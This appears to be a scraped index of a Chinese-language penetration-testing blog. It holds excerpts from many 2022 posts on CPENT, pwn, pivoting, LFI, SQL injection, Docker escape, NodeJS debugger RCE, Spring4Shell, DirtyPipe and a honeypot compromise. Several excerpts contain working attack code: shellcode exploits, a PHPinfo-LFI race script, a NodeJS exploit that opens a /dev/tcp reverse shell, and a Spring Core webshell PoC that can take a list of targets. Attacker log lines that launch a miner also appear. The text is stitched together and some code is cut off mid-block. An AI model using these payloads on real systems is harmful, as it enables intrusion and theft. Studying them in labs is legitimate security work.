本篇文會介紹整體 CPENT 課程教材、考試內容、準備方式以及其與 OSCP 的比較。這些心得部分都以我個人的主觀感受為主，僅供參考，而考試、課程內容也僅代表 2022 年 5 月底至 6 月初的狀況，可能會與未來有所差異。

在考試前我有試著在網路上查詢過 CPENT 相關的考試資料，發現中文資料除了恆逸的業配文之外，沒有看到以較客觀角度來評論這張證照的文章。僅有此 YouTube 影片有提到考試的大致內容 [輕鬆系列] 兩場連續12小時不間斷資安考試，到底資安證照EC-Council CPENT 在考甚麼?!!

因此本文會在不侵犯版權與洩密的前題下，介紹該證照與課程的詳細內容，供準備考試的朋友們進行參考。

課程教材

報名考試後，熱心的恆逸工作人員就寄了一本紙本的教材給我，這本紙本教材約有 1600 頁，內文主要是官方授課的投影片，較少文字敘述，且因為黑白列印的關係，許多原本黑底綠字的 Command Line 截圖都是看不清楚的 QQ。不過該份教材有提供了電子檔，需要透過特有的專屬軟體開啟，裡面的畫面就清楚了很多。相比於 OSCP 約 1000 頁的教材，我認為 CPENT 的教材相對而言比較淺而廣。

教材涵蓋內容

CPENT 的官方教材總共有 14 個章節與 12 個附錄，章節內容如以下：

PT 概論
PT 的範圍與規範
OSINT
社交工程
網路 PT - 外部
網路 PT - 內部
網路 PT - 外圍設備
Web PT
無線網路 PT
IoT PT
OT 及 SCADA PT
雲端 PT
Binary 分析以及 Pwn
報告撰寫

附錄內容

Debug Linux Binary Using Core Dump

Sat, 28 May 2022 12:54:35 +0800

(本篇文環境都使用 Ubuntu 18.04.6 LTS 進行測試)

在一次打 pwn 的經驗中，我發現了一件奇怪的事情，題目檔案沒有開 NX、Canary、PIE，機器也沒有開啟 ASLR。這題題目需要打 64Bit 的 Return to Shell Code，簡而言之，題目會透過讀檔的方式讀取一個寫好 Payload 的檔案，並執行 strcpy。這個 Exploit 就是 Padding + Return Address + Shell Code，而 Return Address 就是 Stack 上面寫的 Shell code，聽起來是一個很簡單的題目。

Exploit 如下

from pwn import *

shellcode = b"H\xb8/bin/sh\x00PH\x89\xe7H1\xf6H1\xd2H\xc7\xc0;\x00\x00\x00\x0f\x05"

payload = flat(
 b'a'*40,
 p64(0x7fffffffddb0),
 shellcode
)

with open("badfile","wb") as f:
 f.write(payload)

關於 Return Address，當然就是使用 gdb 下段點進去找，但奇怪的事情就發生了！這個 Exploit Code 在 gdb 開啟的狀態下可以正常運作，但是程式獨立執行時卻會噴 Error，透過 pwntools 的 process 叫起來也一樣會爛掉。

Double & Triple Pivoting and Proxychains using Chisel

Thu, 26 May 2022 18:07:54 +0800

最近遇到了一個非常極端的情境，需要在內網跳三層的 Tunneling，而且這些機器們都沒有 SSH，這篇文會分享一下如何運用 Chisel 來跳多層的 Pivot。雖然目前的 Cobalt Strike 以及 Meterpreter 都有相應的功能，不過本篇文章我希望使用最傳統，最基本的小工具來完成這個情境。

情境介紹

我們的網路架構如上圖，我們在 Attacker 的機器，而我們需要攻擊的機器分別在不同的網段中，且互相摸不到對方。有三個目標：

要能讓 Server A, B 及 C 摸到我們 Attacker:8000 身上的 Python HTTP Server
要能在 Attacker 端，接收到 A, B 上面的 Reverse Shell
要能透過 Proxychains 在 Attacker 上摸到、掃 Server A, B, C, D 的 TCP Port

我已經預先在 Server A, B 及 C 上擺放好了一句話的 Web Shell 方便操作

想要自己建立 Lab 的話，可以參考以下的 Github 連結： Triple-Pivoting-Lab

重點主要就是這個 Docker Compose 檔案，我們可以把每一顆 Container 都當作一台 Server 來完成以下的實驗。

Remote binary tunneling & Buffer overflow using pwntools

Tue, 24 May 2022 00:24:42 +0800

前陣子因緣際會下，遇到了某個情境，是在一個斷網的環境底下需要透過打 Pwn 的方式來進行提權。這個環境的情境大概是，一個 Binary 具有 SUID 權限可以 Pwn。

但另外一個條件是，機器上面不能開 Port 出來，我也不可能幫對方的機器裝 Pwntools，身為一個 Pwntools 的愛用者，我決定使用邪門歪道把程式給跑起來，接下來進行 Pwn 的動作。

這邊的範例，我使用到今年初，我在台科大資工系講課時的教材，使用 Ubuntu 18.04 的環境打 64 bit 的 Return to Shellcode 的情境。但這篇文的主旨不在 Exploit 這隻 Binary 的過程，而是如何透過 Tunneling 的方式把 Binary 帶到外面來打。因此我直接附上 Binary Source Code 以及 Exploit Code。

// gcc -no-pie -fno-stack-protector -z execstack ret2sc2.c -o ret2sc2
#include
#include 

char name[100];

int main(){
 printf("What's your name : ");
 scanf("%s",name);

 char comment[500];
 printf("What's your comment : ");
 scanf("%s",comment);
 return 0;
}

這邊我關閉了 PIE、Canary 以及 NX 保護，作為最簡單的 Demo 使用， Exploit Code 則使用 pwntools 來寫，非常簡單，就只是蓋 Return Address 並塞下 Shell Code 而已，而我的 Shell Code 是抄網路上的，就只是一個 setuid(0) 以及 execve(/bin/sh)。

How I found CVE-2022-22973 VMWare Workspace ONE Privilege Escalation

Thu, 19 May 2022 10:38:49 +0800

VMWare Security advisories：https://www.vmware.com/security/advisories/VMSA-2022-0014.html

這個漏洞其實是在一個因緣際會下發現的，當初我在研究 CVE-2022-22954，一個 VMware Workspace ONE Access Freemarker 的 SSTI to RCE 漏洞。

後來剛好跟朋友借到一台有洞的 Server 來測試 Exploit，就順利的 RCE 了，接下來，我接回了 Reverse Shell 想試著觀察 Server 內部的檔案結構跟原始碼，發現了當前使用者是 horizon。

Service 使用較低權限的使用者來執行，可以保障系統的安全。當然，入侵的駭客也會嘗試透過各種方式來試著進行提權到 ROOT，這次使用到的技巧完全是我今年 4/13 在台科資安社有提到的，他的構成其實非常簡單。這個梗也常常出現在 Hack The Box 或 Try Hack Me，應該是 Easy 等級的題目，不過在 Real World 出現真的是滿神奇的事情。

提權不外乎， Kernel Exploit (Binary) 系列，或是 Misconfiguration，本次這個漏洞就只是一個程式開發時的小小設定錯誤。

當拿到一台 Linux 的低權限 Shell ，通常我的起手是會先 whoami，觀察使用者名稱；接下來會試著使用 sudo -l 觀察使用者有沒有機會透過 sudo 來搞事。

接下來就發現了一個酷東東，也就是最下面一行的

/opt/vmware/certproxy/bin/certproxyService.sh

horizon 使用者可以使用 sudo 執行該 Script，並且不需要輸入密碼，而另外一個重點是，觀察這個 Script 會發現檔案權限的設定有問題，這個檔案的所屬擁有者就是我們自己 (horizon)，因此我們可以任意竄改裡面的檔案內容。

Advanced Local File Inclusion to RCE in 2022

Sat, 07 May 2022 18:32:21 +0800

蛤，都 2022 年了，還有人不知道 LFI 基本上就 = RCE ㄇ？

還有人 LFI 只會寫 log、努力找上傳檔案的點再來 Include ㄇ？覺得 LFI 就只能 Base64 看看源碼ㄇ？

這篇文整理了一下最近幾年來比較實用的一些 LFI 技巧，透過無腦的貼 POC 就可以快速的 Get Shell。以下我使用 PHP 8.1 apache 做為實驗環境，測試了幾種常見的 RFI to RCE 技巧，理論上在大多數的 PHP 7 底下，預設環境中，不用修改任何的 config 都可以適用。

Environment Setup

docker-compose.yml

version: "3.7"

services:
 webserver:
 image: php:8.1-apache
 volumes:
 - ./web:/var/www/html

web/index.php

&1'"); ?>'''.format(tag=tag,shell_host=shell_host,shell_port=shell_port)

UPLOAD="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
{}
-----------------------------7dbff1ded0714--\r""".format(PAYLOAD)

padding="A" * 5000

## PHPinfo path
INFOREQ="""POST {phpinfo}?a={padding} HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie={padding}\r
HTTP_ACCEPT: {padding}\r
HTTP_USER_AGENT: {padding}\r
HTTP_ACCEPT_LANGUAGE: {padding}\r
HTTP_PRAGMA: {padding}\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: {len}\r
Host: %s\r
\r
{upload}""".format(phpinfo=PHPinfo_File,padding=padding, len=len(UPLOAD), upload=UPLOAD)

# LFI Path
LFIREQ="GET " + LFI_File + """%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""

class PHPINFO_LFI():
 def __init__(self, host, port):
 self.host = host
 self.port = int(port)
 self.req_payload= (INFOREQ % self.host).encode('utf-8')
 self.lfireq = LFIREQ
 self.offset = self.get_offfset()

 def get_offfset(self):
 '''
 获取tmp名字的offset
 '''
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((self.host, self.port))

 s.send(self.req_payload)
 page = b""
 while True:
 i = s.recv(4096)
 page+=i
 if i == "":
 break

 if i.decode('utf8').endswith("0\r\n\r\n"):
 break
 s.close()

 pos = page.decode('utf8').find("[tmp_name] => ")
 print('get the offset :{} '.format(pos))

 if pos == -1:
 raise ValueError("No php tmp_name in phpinfo output")

 return pos+256 #多加一些字节

 def phpinfo_lfi(self):
 '''
 同时发送phpinfo请求与lfi请求
 '''
 phpinfo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 lfi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 phpinfo.connect((self.host, self.port))
 lfi.connect((self.host, self.port))

 phpinfo.send(self.req_payload)

 infopage = b""
 while len(infopage) ")
 tmpname = infopage[pos+17:pos+31]

 lfireq = self.lfireq % (tmpname.decode('utf8'),self.host)
 lfi.send(lfireq.encode('utf8'))

 fipage = lfi.recv(4096)

 phpinfo.close()
 lfi.close()

 if fipage.decode('utf8').find(tag) != -1:
 return tmpname

if __name__ == '__main__':
 print('{x}Start expolit {host}:{port} {attempts} times{x}'.format(x='*'*15, host=host, port=port, attempts=attempts))

 p = PHPINFO_LFI(host,port)
 for i in range(int(attempts)):
 print('Trying {}/{} times…'.format(i, attempts), end="\r")
 if p.phpinfo_lfi() is not None:
 print("Success!!")
 exit()
 print(':( Failed')

Session Upload Progress

session.upload_progress

Session Upload Progress 是目前我最愛用的方法，沒有之一。

SQL Injection Without Column Name and information_schema

Mon, 25 Apr 2022 21:42:56 +0800

前幾天遇到了一個類似 CTF 的 PT 情境，主要狀況是，我有辦法透過 Union Based 的方法進行 SQL Injection；我有辦法得知 Table name，卻無法得知 Column Name。

先工商一下，如果缺乏測試 SQL 的環境，可以使用我的 Repo: DB-Tester ，用 Docker-compose 的方式建立了一個 Web Server 與 SQL Server，目前有支援 MySQL、PostgreSQL、M$SQL、Oracle 等。

Background

通常 SQL Injection 的套路就是，透過 information_schema 裡面的 schemata, tables, columns 來取得資料庫名稱、表格名稱以及欄位名稱，但在這次的情境中，因為 WAF 的設定，我們無法摸到任何的 information_schema，因此只能尋找相關的替代品。

information_schema 的替代品

在 MySQL 版本 >= 5.5 之後，MySQL 預設的 Table Engine 為 innodb，其中，就有資料庫的名稱以及表格的名稱可以利用

mysql> SELECT * FROM mysql.innodb_table_stats;
+---------------+------------+---------------------+--------+----------------------+--------------------------+
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
+---------------+------------+---------------------+--------+----------------------+--------------------------+
| mysql | component | 2022-04-25 12:57:27 | 0 | 1 | 0 |
| sys | sys_config | 2022-04-25 12:57:29 | 6 | 1 | 0 |
| test_db | accounts | 2022-04-25 12:58:06 | 2 | 1 | 0 |
| test_db | news | 2022-04-25 12:58:29 | 0 | 1 | 0 |
+---------------+------------+---------------------+--------+----------------------+--------------------------+

例如想要快速一鍵爆資料庫、資料表名稱，可以使用

NodeJS V8 Engine Debugger Exploit (Part2) - Auto Exploit

Sun, 10 Apr 2022 21:49:12 +0800

在上一篇文，(NodeJS V8 Engine Debugger Exploit) 中，我們使用了 VSCode 的 Debugger 與 Chrome 的 Debugger 把 Node JS 的 Debugger Port 給戳出 Shell。

但上一篇貼文終究要使用到 GUI，用起來總是沒有很舒服，感謝 @uuuuuyurr 大大協助，找到了一個方便的酷酷工具，可以使用 CLI 、程式完成這件事情。

這次需要使用到的套件叫做 chrome-remote-interface

透過 npm i chrome-remote-interface 即可進行安裝。

接下來把官方的範例程式做一點點小小小修改，其他環境皆與上次的實驗環境相同，就可以 RCE 囉！

Exploit 程式碼：

const CDP = require('chrome-remote-interface');

async function example() {
 let client;
 try {
 // connect to endpoint
 options = {
 "host": "192.168.40.136",
 "port":9229
 }
 client = await CDP(options);
 r = await client.Runtime.evaluate({expression: `global.process.mainModule.constructor._load("child_process").exec("bash -c 'bash -i >& /dev/tcp/192.168.40.135/443 0>&1'")`});
 console.log(r);

 } catch (err) {
 console.error(err);
 } finally {
 if (client) {
 await client.close();
 }
 }
}
example();

NodeJS V8 Engine Debugger Exploit

Tue, 05 Apr 2022 21:55:32 +0800

前陣子，在某個奇怪的情境下遇到的狀況，我擁有一台機器上跑的 Server 的完整 Source Code，且其 NodeJS 的 Debugger Port 是開啟的狀態，在這種情況下是有辦法取得 RCE 的嗎？

這邊我建立了一個簡單的 NodeJS 的 Script，功能很直覺，應該不需要多做解釋。

const express = require('express')
const app = express()
const port = 3000

app.get('/', (req, res) => {
 var name = req.query.name
 res.send('Hello ' + name + " !!");
 })

 app.listen(port, () => {
 console.log(`Example app listening on port ${port}`)
 })

如果說，我們的這隻程式因為各種緣故，需要使用遠端 Debugger 的話，很可能會用下面的方法叫起來，不過這種方法是超級無敵危險的！

nodejs --inspect=0.0.0.0 main.js

VSCode Exploit

假設我們的程式在 Victim 端使用上述方法跑起來，而 Attacker 擁有完全一樣的 Code 的話，可以在專案中新增下面的檔案，並把 IP Address 修改成 Victim 的 IP。

Docker Post Exploitation and Escape

Mon, 04 Apr 2022 23:58:21 +0800

最近常常遇到 Docker 相關的機器， Docker 機器裡面通常都很乾淨，缺少很多可以用的小工具，所以後滲透比起普通 Linux 機器有一點點點的不同 QQ，本文會用幾個小例子簡介一下 Docker 的後滲透技巧以及逃脫方法

以下範例的機器 IP:

Kali (Attacker) : 192.168.40.135
Ubuntu (Victim) : 192.168.40.136

Mount Host Root Directory

在這邊的例子中，我們假設我們已經擁有了 Container 中的 Root 權限，且嘗試想試著逃離 Docker

這邊使用的 Docker 環境是這樣叫起來的

sudo docker run -v /:/host -it ubuntu bash

觀察電腦中的 Process

假設我們把 host 的根目錄 mount 在 container 的 /host，我們可以透過寫一個簡單的小腳本來觀察 host 機器上執行了哪些的 process

#!/bin/bash

for dir_name in $(ls -d /host/proc/*/ | grep -E '\/host\/proc\/[0-9]+\/'); do
 echo $dir_name;
 cat $dir_name/status 2>/dev/null | head -n 1;
 cat $dir_name/cmdline 2>/dev/null ; echo -ne '\n';
 echo '============================'
done

透過觀察 Host 的 Process，我們可以設法找出電腦中可以利用的 Process，範例輸出：可以觀察到電腦有開 SSH

CVE-2022-0332 Moodle SQL Injection Reproduce

Fri, 01 Apr 2022 22:53:16 +0800

起因是，HITCON Girls 的成員來詢問我關於這個 CVE 的 Exploit 方法，她說實作了一天都卡在一些參數問題上，所以我就架起來玩了一下。

Moodle / 母斗是一個很大的 LMS，目前台科大也正在使用，我目前也在被摧殘的第六年，ㄏㄏ。

Public Information

Exploit-DBhttps://www.exploit-db.com/exploits/50700GitHub- https://github.com/numanturle/CVE-2022-0332

Build Environment

要復現這個漏洞，比想像中麻煩很多，這邊我使用了 Docker-compose 來快速建置環境，基本上內容來自 bitnami-docker-moodle ，我唯一做了修改的部分是把第 15 行指定了 Moodle 的版本

docker-compose 內容

version: '2'
services:
 mariadb:
 image: docker.io/bitnami/mariadb:10.3
 environment:
 # ALLOW_EMPTY_PASSWORD is recommended only for development.
 - ALLOW_EMPTY_PASSWORD=yes
 - MARIADB_USER=bn_moodle
 - MARIADB_DATABASE=bitnami_moodle
 - MARIADB_CHARACTER_SET=utf8mb4
 - MARIADB_COLLATE=utf8mb4_unicode_ci
 volumes:
 - 'mariadb_data:/bitnami/mariadb'
 moodle:
 image: docker.io/bitnami/moodle:3.11.4
 ports:
 - '80:8080'
 - '443:8443'
 environment:
 - MOODLE_DATABASE_HOST=mariadb
 - MOODLE_DATABASE_PORT_NUMBER=3306
 - MOODLE_DATABASE_USER=bn_moodle
 - MOODLE_DATABASE_NAME=bitnami_moodle
 # ALLOW_EMPTY_PASSWORD is recommended only for development.
 - ALLOW_EMPTY_PASSWORD=yes
 volumes:
 - 'moodle_data:/bitnami/moodle'
 - 'moodledata_data:/bitnami/moodledata'
 depends_on:
 - mariadb
volumes:
 mariadb_data:
 driver: local
 moodle_data:
 driver: local
 moodledata_data:
 driver: local

執行 Docker

基本上執行下面的指令，就可以把完整的環境跑起來了

Spring Core RCE JDK 9+ PoC and Experiment (2022/03/31)

Thu, 31 Mar 2022 00:36:33 +0800

從昨天晚上開始，就一大堆人開始傳說 Spring Core 的 RCE 漏洞

漏洞八卦 QQ

但是一直都只有很片段的一些 PoC 流出來，例如

或是一些被馬的亂七八糟的截圖 QQ，(原文已被刪除)

還出現了一些梗圖

還有其他的八卦是，今天下午時，有打著公開 PoC 名義的釣魚腳本，裡面還暗藏了惡意程式 https://cn-sec.com/archives/853963.html ，ㄟ這樣黑吃黑真的很不可取 = =。

這個漏洞難找還有另外一個原因是因為，前幾天又剛好有另外一個 Sprint cloud function 的 RCE (CVE-2022-22963)，相關討論串與 PoC 在這邊，很多人都會把這兩個洞給搞混。初步了解，這兩個漏洞完全沒有任何關係。

撿到漏洞利用

終於在剛剛，我在 Twitter 上撿到了一隻 PoC

https://twitter.com/Dinosn/status/1509201762665873410

Github 連結： https://github.com/dinosn/spring-core-rce/blob/main/test.py

為了避免任何意外， PoC 備份在以下，著作權仍屬於原作者 dinosn

PoC 備份

#coding:utf-8

import requests
import argparse
from urllib.parse import urljoin

def Exploit(url):
 headers = {"suffix":"%>//",
 "c1":"Runtime",
 "c2":"<%",
 "DNT":"1",
 "Content-Type":"application/x-www-form-urlencoded"

 }
 data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 try:

 go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
 shellurl = urljoin(url, 'tomcatwar.jsp')
 shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
 if shellgo.status_code == 200:
 print(f"漏洞存在，shell地址为:{shellurl}?pwd=j&cmd=whoami")
 except Exception as e:
 print(e)
 pass

def main():
 parser = argparse.ArgumentParser(description='Srping-Core Rce.')
 parser.add_argument('--file',help='url file',required=False)
 parser.add_argument('--url',help='target url',required=False)
 args = parser.parse_args()
 if args.url:
 Exploit(args.url)
 if args.file:
 with open (args.file) as f:
 for i in f.readlines():
 i = i.strip()
 Exploit(i)

if __name__ == '__main__':
 main()

建立環境

使用這個 Docker 試著建立攻擊環境

Using boto3 to control the AWS EC2

Wed, 23 Mar 2022 14:39:17 +0800

Install awscli and boto3

sudo apt install awscli
pip3 install boto3

Add a new AWS user

Go to https://console.aws.amazon.com/iam/home
Add User, pick a username, and set the AWS credential type to Access key

In the “Set permissions” section, select the “Attach existing policies directly” and check the AmazonEC2FullAccess

And it will receive an Access Key ID and a Secret Access key

Configure the aws-cli

Run the command

aws configure

Input the AWS Access Key ID and AWS Secret Access key, other leave blanks.

深入理解多種 PHP 系統函數的差別 (system, shell_exec, exec, passthru, popen, proc_open)

Sat, 19 Mar 2022 13:57:50 +0800

在戳 Webshell 時，時常會被 Disable Function 給雷，而網路上的各種 Cheat Sheet 也常常會教我們， Bypass Disable Function 的其他函數。這邊先不考慮 LD_PRELOAD 或是其他奇技淫巧的繞過方法，我們從最常見的 6 種可執行系統指令的 Function 開始，探討它們在正常使用時的不同。明明功能都差不多，甚至一樣，為什麼 PHP 要定義出這麼多的函數呢？ ~~因為 PHP 是一個非常 Hacker Friendly 的語言，有各種方法可以讓駭客繞繞繞！~~~

本文會比較 system、shell_exec、exec、passthru、popen 以及 proc_open 等 Function 的差異。

system

讓我們從 system 函數開始，觀察 Spec 可以看出，官方的敘述。

system — Execute an external program and display the output

system 指令會執行外部程式，並且直接把結果輸出 (類似於 echo 到螢幕上)，這邊也有一個特性就是，當程式每輸出一行，畫面結果就會刷新一次 (儘管程式可能還沒結束)。

system 指令有兩個參數，分別是 $command 以及 &$result_code。$command 應該不用特別敘述，而 &$result_code 會使用 Pass by reference 方式把 Linux 的 Return Status Code 給回傳到該參數。

透過 Scapy 以及 Socket 實作 Application 層的 Replay Attack

Sat, 12 Mar 2022 23:34:28 +0800

工業控制或是 IoT 等裝置很容易出現 Replay Attack 的攻擊方式，也就是傳送一樣的封包，就可以對這些裝置下一些指令，這些裝置不一定會驗證發送者的身分，或是透過 nonce 等方式進行確認。以下是一個很簡單的例子來快速地透過 Scapy 實作 Replay Attack 的方法。

在這個例子中，我會使用 HTTP 協定來當作我們需要使用的目標，我們先假設 HTTP 是一個我們完全不認識的奇怪協定，我們希望可以透過鯊魚來紀錄，修改其中的一兩個 Bytes ，並重新發送給 Server。

Server 準備

首先我在我的 Server 上準備了 4 個 txt 檔案，檔名分別叫做 1, 2, 3, 4

echo one > 1
echo two > 2
echo three > 3
echo four > 4

接下來在同一個資料夾中使用了 Python 開啟一個 HTTP Server 在 8000 Port

python3 -m http.server

Client 準備

這邊的 Client 我們可以假裝說是工控場域的 HMI，準備發送指令給 PLC Server 這樣的場景。我使用 curl 指令來快速對伺服器建構了兩條的 HTTP Request (或是說 TCP 連線)。

利用 CVE-2022-0847 DirtyPipe 進行 Linux 提權

Tue, 08 Mar 2022 12:58:55 +0800

一起床就看到了好玩的東西，昨天 (3/7) Max Kellermann 揭露了一個 DirtyPipe 的漏洞 https://dirtypipe.cm4all.com/ 名字聽起來就跟 DirtyCow 很像，也是一個可以本地提權的漏洞，漏洞詳情可以看上方連結的研究。

網路上也馬上就出現了一大堆 Exploit 的腳本，這邊我拿 Arinerron 的來試玩了一下。

首先到 Ubuntu 官網下載了最新版的 20.04 VM。

steven@ubuntu:/tmp$ uname -a
Linux ubuntu 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

安裝好後，新增一個沒有 root 權限的使用者做為測試。

sudo adduser testuser

下載並編譯腳本

cd /tmp
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
cd CVE-2022-0847-DirtyPipe-Exploit/
./compile.sh

當然如果 Victim 端沒有 gcc 的話，也可以在 attacker 機器上編譯好再傳過去。

接下來執行

./exploit

就順利的可以提權到 Root 了！

理論上這個漏洞跟髒牛牛一樣，有很大的機率會搞壞 Linux Kernel，最近真的好多有趣的提權方法呢，前陣子的 pwnkit 跟這次的 Dirtypipe，看樣子大家的 Linux 真的要記得常常更新 (但 Server 更新也很可怕就是了 QQ)。

使用 Docker 執行 Metasploit

Fri, 04 Mar 2022 22:31:31 +0800

其實，我跟 Metasploit 沒有太熟，因為他太方便，太無惱了，導致 OSCP 的考試禁止使用。我在練習 PT 時也就都直接當作這個軟體不存在 XD。但事實上 Metasploit 真的算是一個很實用的工具，只需要無腦的設定好 payload 之後 run / exploit 下去就好了。

而 Reverse Shell 的部分，我一直以來都習慣使用 Stageless 的 Shell，不過其實 Meterpreter 以及其他 Staged 的 Shell 在實務上是滿好用的。

現在常見的滲透測試 OS ，例如 Kali 或是 Parrot 裡面都已經內鍵了 Metasploit 的指令，使用者不需要煩惱太多安裝的問題。通常在各種平台練習靶機時，官方都會發放一個 VPN，攻擊者只需要把 Shell 彈回這個內網裡面的自己機器即可。

不過在實務上，事情就沒有這麼簡單了，如果我們使用簡單的 Stageless 的 Reverse shell ，當不在內網時，我們可以在雲端機器上隨便開一個 nc / ncat 來收，但 Stage 的就不同了，通常會需要使用 msfconsole 的 exploit/multi/handler 來接收。

在 GCP 上沒有內建 Kali, Parrot OS 的機器 (AWS 上有 Kali，但我比較不習慣用 AWS)，當然可以自己上傳 image 檔案上去做一些處理，不過先前我的經驗是會遇到一些雷需要克服，因此最好的方法還是直接在雲端機器裡面部屬 msf，根據官方的說法，可以透過下面指令來安裝 msf

我的 Honeypot 被 Muhstik 駭惹 ?!

Wed, 02 Mar 2022 16:17:42 +0800

在年假前，我部屬了幾台 WordPress 的 Honeypot 想撿看看野生的 Payload，我當時把 Docker 給跑起來之後就丟著，沒有特別去管它。

年假結束後，打開我的監控軟體觀察，一看下了一跳，竟然在奇怪的地方被塞了一個 WebShell !! 是從非預期的方法進來的，太怪了ㄅ QQ

接下來我對這個入侵方式做了一系列的探索，發現了一些有趣的東西。

觀察入侵方式

進入點

暫時來當藍隊觀察一下入侵方式，直接對 access log 透過 grep 觀察 webshell 的檔名

162.55.76.218 - - [29/Jan/2022:20:45:18 +0000] "GET /wp-content/themes/twentytwentyone/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14"
162.55.76.218 - - [29/Jan/2022:20:45:23 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4"
162.55.76.218 - - [29/Jan/2022:20:45:24 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?wie HTTP/1.1" 200 635 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0a2) Gecko/20110524 Firefox/5.0a2"
162.55.76.218 - - [29/Jan/2022:20:45:25 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 597 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentytwenty/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.04506.648; .NET4.0C; .NET4.0E)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+kill_dangling_irc%3B+bash+kill_dangling_irc+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)"
162.55.76.218 - - [29/Jan/2022:20:45:26 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+xmr64%3B+.%2Fxmr64+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10"
162.55.76.218 - - [29/Jan/2022:20:45:57 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24"
54.36.49.151 - - [04/Feb/2022:02:24:59 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18"
54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "POST /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php HTTP/1.1" 200 597 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre"
54.36.49.151 - - [04/Feb/2022:02:25:00 +0000] "GET /wp-content/themes/twentynineteen/C9698F925C1D8B544C62895AABF85155.php?knal=chmod+%2Bx+kill_dangling_irc%3B+bash+kill_dangling_irc+%3E+%2Fdev%2Fnull+2%3E%261+%26 HTTP/1.1" 200 432 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12"
